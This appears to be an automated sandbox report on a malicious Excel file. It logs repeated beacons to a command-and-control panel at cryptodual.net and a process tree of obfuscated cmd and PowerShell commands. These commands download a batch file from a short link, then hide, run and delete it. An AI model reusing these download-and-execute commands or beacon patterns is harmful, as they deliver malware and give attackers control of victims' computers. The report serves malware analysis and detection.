Jan 4, 2021 19:17:20.719814062 CET	1364	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:20.784519911 CET	1365	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 07703742740000c77922929000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=v9A6ewaY2Kqstfrzv%2FEP4Fb1gCiLb7WTl%2BWMYrbf%2FBvwIMDtpEK9rBPSU9keRpl1OIZlJJh2j7OP4GgOXyX4Hxv1oxD%2FziUu2uzMFCMT6w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f4b0bf0ec779-AMS Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:25.787287951 CET	1366	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:25.867825031 CET	1367	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 077037563f0000c77941986000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=U%2B8CiPZZ7uif5Wr9XjmO9Y5RIoNKfycWsHhj10iLKH105Vn%2B8nJVqvg8Z7f%2FvvVDJngdFJ5KsZ9Br2TJGjp5vdulX4zBghSKjm%2B3Ao7QUQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f4d06fa6c779-AMS Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:25.868453026 CET	1367	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:25.931865931 CET	1368	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 07703756910000c7792aa98000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=88NnaDftzlWxxCoYAZ0BMk1T8P0tGNLEzguUtXQth7p5JS0jGTSCp87ag9IB%2BAhs4giBtXgCLtF%2BzIKsZIgLdLCmiK4rYdmSENrisYU6Lw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f4d0e8c4c779-AMS Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:25.932638884 CET	1369	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:25.993691921 CET	1370	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 07703756d10000c7795d110000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=MOaaDS2XW8RzmV%2FLo0nn%2FpWj2ASkPOYJiz6tmDiYkPCmonnxg%2Bay4snVrnvobln0MQu0Y61OONLSTIduXckG%2BzbXFjjmOGk2y0c27F3mOg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f4d149b1c779-AMS Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:25.994359016 CET	1371	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:26.058743954 CET	1372	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 077037570f0000c77959b5b000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=sg5%2BYF9ymGVDVl8ysP1KXOsQlBv9tovxikhl9l%2BMSp1ELv95FeBDg5ExesnZj1Tlw%2F8UX%2Fw4DvBFASWcP7%2BLKgwkRhSJU3s3XqpuAtnXBg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f4d1baa3c779-AMS Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:31.060841084 CET	1375	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:31.129498959 CET	1375	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 0770376ada0000c77952a2a000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=4pjQPhefspjiQSDplmHj8qKX8hA%2FcYFmMoRBv8nhVAAyM%2BCBpUhj%2FwNOdmKecXbP8Fc%2BvTCndwgu5pTzAG9pm2F4ziu%2FwBwmh6oKGEQJjA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f4f15c9ec779-AMS Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:31.131783962 CET	1376	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:31.210427999 CET	1376	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 0770376b210000c7791d13f000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=fgqXG2jx3UhH0KXQGfWxNwc2SBUyTPbeOaTD72FXYn1aJYZLjvijVUKTu1Z6uJx5T3amURYfbSK3thGLE7%2FhoAjbVh6H1eBPM7066SLdWQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f4f1cdafc779-AMS Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:31.630044937 CET	1377	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:31.695410013 CET	1378	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 0770376d120000c779843b1000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=WPBnKZOX4WJLPbdyNL52TQkH%2BYKAoXp%2Bkfi6m3rRPxXAizpx37ehvmUWaTvwcYYcSREwKqmPxM9xgXM767gdm15NsLKBFeNcQi4Vj31ePQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f4f4ec71c779-AMS Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:31.695956945 CET	1378	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:31.757940054 CET	1379	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 0770376d550000c77978835000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=NNt%2FhyqK6o9Hjw%2BxR6O3CfJ3vQeTfastGa3MfCktah0ldvetzV%2F2I4EnNzzMy6wz5w9a7Qk9wRhoZ8hne6iQbq60rF%2B3mrYrvYmn7ld2Tw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f4f55d2bc779-AMS Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:36.756045103 CET	1383	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:36.835577965 CET	1383	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 07703781190000c77937b66000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=yle8E8FgSFU5XDpdFaiC3jSIKmyUGxpvzFJKcQpEo5CHF89zWg2K34CKEPLoz5Dh44orVK8YANKNs4zcvotnggFU4CtwgDwS1b%2BOZ6hu0g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f514fa54c779-AMS Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:36.836218119 CET	1384	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:36.898669004 CET	1384	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 07703781680000c7791d2e7000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=UAOIx%2BZmxDpwvXrauC0PTUr9Es8y%2FmHDohtys%2B3R5rqCyI68TM380dFxp6zZG9avpGFdD2HFCa5%2BJFfZPMFDR6B09QlCbYd01qm25UZOmw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f5157b54c779-AMS Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:36.899524927 CET	1385	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:36.964807987 CET	1385	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 07703781a70000c779218b4000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=deaeoZM7W9h6gwTqL5ruHJLlnQrDTBIhEwX3YO2MjexPXlKlekVYAGbkR%2Fe28tSRFArdD1l81%2BBLYa2%2FRreYWPZa%2FQXtA2Wiji9hCI6c%2Fw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f515dc2ec779-AMS Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:36.965912104 CET	1386	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:37.037558079 CET	1387	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 07703781ea0000c7797c24f000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=LV2IvDXCVwrfe49OpnYekYXCIH9e4A%2FiVFCIm4V4Ks7ewrY2PtZdhoQUEqWdyL%2Fu9Y7Fv%2B7AhxRQ0vrPNXp5E0NFNFk4K4InsFdyBTJqWg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f5164ccfc779-AMS Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:42.043807983 CET	1391	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:42.134742022 CET	1391	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 07703795c00000c7798429d000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=PLojQtEHydZuDHzzzJtikiUmYh%2Br26DiT8Gsq2dRR9oPzQOQkg6dr4zFJV8Wth%2B9LHTabasWPR62%2F2bRf%2FZoMJ5pVATofIh0%2BBcyxKxrbQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f535fcabc779-AMS Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:42.135365963 CET	1392	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:42.210437059 CET	1392	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 077037961b0000c7797b979000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=cJveEi5o2AXnPZEGJeweACBujj1zHzxlmBL6iJBHKU%2BbE51YM0gxlzKrLs445F5A1xWisuNePYVaYqVyoxa%2Bc6wKWVCc5nFFxJGNp5Hzag%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f5369dbfc779-AMS Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:42.211040020 CET	1393	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:42.273996115 CET	1393	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 07703796670000c7793d38e000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=hsBSHKJCeMJ3zUf6ywPWvocVMy0bAsl1HTbqpBLdmmpxILqzu7gF7CZ0vBNL7qU4%2BFCwOUspA2vdHuwQrybT7ibuULReuk%2BaAJXOzMs5tQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f5370eb8c779-AMS Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:42.274714947 CET	1394	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:42.778896093 CET	1396	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 07703796a60000c7791d08b000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=%2F39emKgVg9G6RjkR%2B5tvtxhEdXpKBQIMP6mMIkqyAbc7eU64lSNXoZYTjkTGI%2B%2B7d5j2QXartg15DTUilvNKmhJ%2FwnXh%2FRyKmdk4bqBxEw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f5377f41c779-AMS Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:47.786000013 CET	1399	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:47.857158899 CET	1400	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 077037ac2e0000c7797c1cc000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=eutcaecLXRHl%2FYpqMsLYbB6FRKhlPgCnwuuVku1tJTHGtyZtr%2FQ4vwTgAVZOJK0PYE%2FruMswWkpn3VtKMfC4%2Bq9Xd2epd98xVhZfx4N1rw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f559ec00c779-AMS Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Jan 4, 2021 19:15:31.228230953 CET	172.67.8.238	443	192.168.2.22	49167	CN=www.cutt.ly CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US	Sat Feb 08 01:00:00 CET 2020 Thu Nov 02 13:24:33 CET 2017	Thu Apr 08 14:00:00 CEST 2021 Tue Nov 02 13:24:33 CET 2027	769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0	05af1f5ca1b87cc9cc9b25185115607d
Jan 4, 2021 19:15:31.228230953 CET	172.67.8.238	443	192.168.2.22	49167	CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Nov 02 13:24:33 CET 2017	Tue Nov 02 13:24:33 CET 2027		05af1f5ca1b87cc9cc9b25185115607d
Jan 4, 2021 19:15:41.591857910 CET	172.67.167.122	443	192.168.2.22	49170	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Tue Aug 18 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020	Wed Aug 18 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025	769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0	05af1f5ca1b87cc9cc9b25185115607d
Jan 4, 2021 19:15:41.591857910 CET	172.67.167.122	443	192.168.2.22	49170	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		05af1f5ca1b87cc9cc9b25185115607d

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 944 Parent PID: 584

General

Start time:	19:14:45
Start date:	04/01/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13f950000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: cmd.exe PID: 2560 Parent PID: 944

General

Start time:	19:14:48
Start date:	04/01/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Imagebase:	0x4aaa0000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: cmd.exe PID: 2556 Parent PID: 944

General

Start time:	19:14:48
Start date:	04/01/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Imagebase:	0x4aaa0000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: cmd.exe PID: 1976 Parent PID: 944

General

Start time:	19:14:48
Start date:	04/01/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Imagebase:	0x4aaa0000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: powershell.exe PID: 2312 Parent PID: 2560

General

Start time:	19:14:49
Start date:	04/01/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Imagebase:	0x13fa60000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Analysis Process: cmd.exe PID: 2344 Parent PID: 944

General

Start time:	19:14:49
Start date:	04/01/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Imagebase:	0x4aaa0000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: powershell.exe PID: 2800 Parent PID: 2556

General

Start time:	19:14:49
Start date:	04/01/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Imagebase:	0x13fa60000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Analysis Process: cmd.exe PID: 2804 Parent PID: 944

General

Start time:	19:14:49
Start date:	04/01/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')
Imagebase:	0x4aaa0000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: svchost.exe PID: 2856 Parent PID: 428

General

Start time:	19:14:49
Start date:	04/01/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:	0xff0e0000
File size:	27136 bytes
MD5 hash:	C78655BC80301D76ED4FEF1C1EA40A7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: powershell.exe PID: 2880 Parent PID: 1976

General

Start time:	19:14:50
Start date:	04/01/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Imagebase:	0x13fa60000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Analysis Process: powershell.exe PID: 960 Parent PID: 2344

General

Start time:	19:14:50
Start date:	04/01/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Imagebase:	0x13fa60000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Analysis Process: powershell.exe PID: 2448 Parent PID: 2804

General

Start time:	19:14:50
Start date:	04/01/2021
